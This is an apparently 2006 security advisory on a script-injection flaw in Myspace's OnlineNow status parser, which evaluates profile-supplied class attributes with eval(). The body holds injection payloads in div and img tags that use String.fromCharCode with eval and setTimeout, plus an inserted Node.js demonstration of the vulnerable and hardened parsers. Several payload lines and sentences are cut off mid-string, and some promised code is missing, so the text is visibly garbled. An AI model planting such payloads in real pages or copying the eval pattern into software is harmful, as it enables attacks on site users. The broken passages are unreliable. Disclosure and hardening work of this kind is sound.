Myspace.com - Intricate Script Injection
Date: Sun Apr 09 2006 - 17:31:18 CDT
Myspace.com - Intricate Script Injection Vulnerability
Reported April 5th, 2006
Script Injection Within the OnlineNow Mechanism
The OnlineNow Mechanism:
Within almost every page on the website there are embedded scripts that define the functions and objects necessary to dynamically provide the online/offline status of users on Myspace. Within the provided HTML there are specific <div> tags that are to be handled by these functions. They are typically placed underneath the picture of the "friend" and pass that friend's specific friendID to the OnlineNow functions. An example of such a tag is as follows:
<div style="width: 80px; height: 20px;" id="UserDataNode0" class="DataPoint=OnlineNow;UserID=17601323;"></div>
The ID of these tags follows the format of 'UserDataNodeN' - where the value of N increases in sequential order from 0 to (the number of tags - 1). At the end of the HTML the OnlineNow mechanism is called which finds all the tags, parses out all the UserIDs specified in the class property and passes them to an iframe which calls on a web-application that returns a true/false value specifying whether that FriendID is found to be "online now". The flow of code proceeds to then find all of these friendIDs that were found to be online and set the DIV tag's innerHTML to display an image that shows the user is online within the browser display.
The OnlineNow Vulnerability:
There is a script injection vulnerability within this mechanism specifically found during the searching and parsing of the <div> tags. I will be extensively referencing the function _OnlineNowNodeParser_locateNodes() found in OnlineNowNodeParser.js. A copy of the function will be placed here for such reference:
    function _OnlineNowNodeParser_locateNodes()
    {
        var CurrentNode = null;
        var i = 0;
        while ((CurrentNode = document.getElementById("UserDataNode" + i)) != null)
        {
            NodeIndex = this.NodeArray.length;
            this.NodeArray[NodeIndex] = new Object();
            this.NodeArray[NodeIndex].NodeID = CurrentNode.id;
            // the class attribute is a semicolon-delimited list of Name=Value pairs
            var Attributes = CurrentNode.className.split(";");
            for (var AttributeIterator = 0; AttributeIterator < Attributes.length; AttributeIterator++)
            {
                // Name is the text before '=', Value the text after it
                // (the [0]/[1] indices are assumed; the quoted copy shows split("=") for both)
                var Name = Attributes[AttributeIterator].split("=")[0];
                var Value = Attributes[AttributeIterator].split("=")[1];
                // Name and Value are spliced straight into source text and eval()'d:
                // this is the injection point
                if (Name != "" && Value != "") eval("this.NodeArray[" + NodeIndex + "]." + Name + "=\"" + Value + "\";");
            }
            i++;
        }
    }
The function starts a loop at i = 0 and checks for the existence of an element whose ID has the format "UserDataNode" + i. It then splits the semicolon-delimited class property and extracts a Name and Value pair from each entry of the form Name=Value (i.e.
<div id="UserDataNode0" class='UserID=17601323"+String.fromCharCode(59)+";'></div>
This will generate a call to the eval() function in the following manner:
The function String.fromCharCode(118,97,114,32,119,61,51,59,97,108,101,114,116,40,119,41,59) returns the string "var w=3;alert(w);"
By compounding this with eval() as so:
A variable 'w' will be defined with the value 3 and a message box will display its value. The following tag - when passed to our locateNodes() function - will execute the aforementioned line of code:
<div id="UserDataNode0" class='UserID=17601323"+eval(String.fromCharCode(118,97,114,32,119,61,51
in that the timer function has a separate thread it executes in, which is important in considering race-type conditions) and is NOT filtered by Myspace. The following tag, when placed within the realms of Myspace, will execute the line
document.location="http://www.google.com"; (the actual script to be injected with this exploit is completely arbitrary and without limitations):
<div id="UserDataNode0" class='UserID=17601323"+setTimeout(String.fromCharCode(100,111,99,117,10
Additional Commentary On Exploit Development:
I'd like to make additional notes about exploit development. Even though I've stuck with using the <div> element in describing the vulnerability and writing the exploit, it should be apparent to those who look at the function that the element is not found by the type of tag but solely by the ID property (using getElementById). Knowing this, the exploit can use ANY element tag (not <div> alone), since it only needs to give the element an ID of the form "UserDataNodeN". If Myspace were to start filtering <div> tags in the face of this vulnerability, that would not correctly patch it. One can just as easily use the allowed <img> tag to exploit the vulnerability like so:
<img id="UserDataNode0" class='UserID=17601323"+setTimeout(String.fromCharCode(100,111,99,117,10
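The following is an added example, not code from this advisory or from Myspace: a DOM-free re-creation of the locateNodes() parsing logic in Node.js, first in the quoted eval() style and then hardened. The PAGE object, the getElementById() stand-in and the second node's class value are constructed for the demonstration; the only Myspace-shaped input is the class format quoted above. The hardened version replaces string-built eval() with plain property assignment, allowlists attribute names, requires UserID to be decimal digits and, picking up the point above that the lookup is by ID alone, checks the tag name explicitly as defence in depth.

```javascript
// Added example (not Myspace's code): the OnlineNow node parser rebuilt
// without a browser, first in the eval() style quoted in the advisory and
// then hardened. Elements are constructed stand-ins for DOM nodes.

// Constructed page: one well-formed friend node, then a node of a different
// tag whose class value contains a double quote and a JS expression.
const PAGE = {
  UserDataNode0: {
    tagName: "DIV",
    id: "UserDataNode0",
    className: "DataPoint=OnlineNow;UserID=17601323;",
  },
  UserDataNode1: {
    tagName: "IMG",
    id: "UserDataNode1",
    className: 'UserID=1"+(6*7)+"', // constructed hostile value
  },
};

// Stand-in for document.getElementById(): lookup is by id alone, so the
// element's tag is never consulted, exactly as the advisory notes.
function getElementById(id) {
  return Object.prototype.hasOwnProperty.call(PAGE, id) ? PAGE[id] : null;
}

// Vulnerable parser, structured like _OnlineNowNodeParser_locateNodes():
// Name and Value from the class attribute are spliced into source text
// that is then eval()'d, so any value carrying a double quote escapes the
// string literal and is evaluated as script.
function locateNodesUnsafe() {
  const nodeArray = [];
  let currentNode;
  for (let i = 0; (currentNode = getElementById("UserDataNode" + i)) !== null; i++) {
    const nodeIndex = nodeArray.length;
    nodeArray[nodeIndex] = { NodeID: currentNode.id };
    for (const attribute of currentNode.className.split(";")) {
      const name = attribute.split("=")[0];
      const value = attribute.split("=")[1];
      if (name !== "" && value !== undefined && value !== "") {
        eval("nodeArray[" + nodeIndex + "]." + name + "=\"" + value + "\";");
      }
    }
  }
  return nodeArray;
}

// Hardened parser: no source text is built, attribute names come from an
// allowlist, values are restricted to a safe character set and UserID must
// be a plain decimal number. Returns null for anything malformed.
const ALLOWED_NAMES = new Set(["DataPoint", "UserID"]);
const VALUE_PATTERN = /^[A-Za-z0-9]+$/;
const USER_ID_PATTERN = /^[0-9]{1,12}$/;

function parseDataAttributes(className) {
  const result = {};
  for (const attribute of className.split(";")) {
    if (attribute === "") continue; // a trailing ';' leaves an empty entry
    const eq = attribute.indexOf("=");
    if (eq < 1) return null; // no name or no '='
    const name = attribute.slice(0, eq);
    const value = attribute.slice(eq + 1);
    if (!ALLOWED_NAMES.has(name) || !VALUE_PATTERN.test(value)) return null;
    if (name === "UserID" && !USER_ID_PATTERN.test(value)) return null;
    result[name] = value; // plain property assignment, nothing is evaluated
  }
  return result;
}

function locateNodesSafe() {
  const nodeArray = [];
  let currentNode;
  for (let i = 0; (currentNode = getElementById("UserDataNode" + i)) !== null; i++) {
    // Defence in depth only: the real fix is parseDataAttributes(), since
    // any element can carry the id, as the advisory points out.
    if (currentNode.tagName !== "DIV") continue;
    const attributes = parseDataAttributes(currentNode.className);
    if (attributes === null || attributes.UserID === undefined) continue;
    nodeArray.push({ NodeID: currentNode.id, ...attributes });
  }
  return nodeArray;
}

console.log("eval-based parser:", JSON.stringify(locateNodesUnsafe()));
console.log("hardened parser  :", JSON.stringify(locateNodesSafe()));
```

Run it with node. The eval-based parser returns the hostile node's UserID as "142": the arithmetic inside the class value was executed, which is the whole defect. The hardened parser returns only the well-formed friend, because the second node fails both the tag check and the value pattern, and parseDataAttributes() can be unit-tested on its own against hostile class strings.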
Conclusion and Overview
The security consciousness within Myspace.com appears to be poor to say the least. In my own experiences of trying to touch base with the right people and trying to work with them in strengthening security - my motions were not accepted with any kindness most times and at others had not been acknowledged at all. It would seem that very few people on staff have any degree of understanding of the seriousness of vulnerabilities within a social network that stores information on millions of people, with millions of active users, and a huge YOUNG demographic - and any that do seem to make themselves out of reach.
It is my own opinion that, especially amidst the attention they have been getting in the media with predators using Myspace as a tool to target children and incidents of child pornography found within the domain, they would have an exceptional interest and concern for the security of its users. If security cannot be addressed within Myspace there are a great number of just as good clones that provide more attention to this issue. Such alternatives as Tagworld.com have been getting an increase in popularity due to its integrity and better model. I do not know of reports in auditing Tagworld or others, but it would be worth it to look into these alternatives to find a company that could provide a social experience without providing a security threat.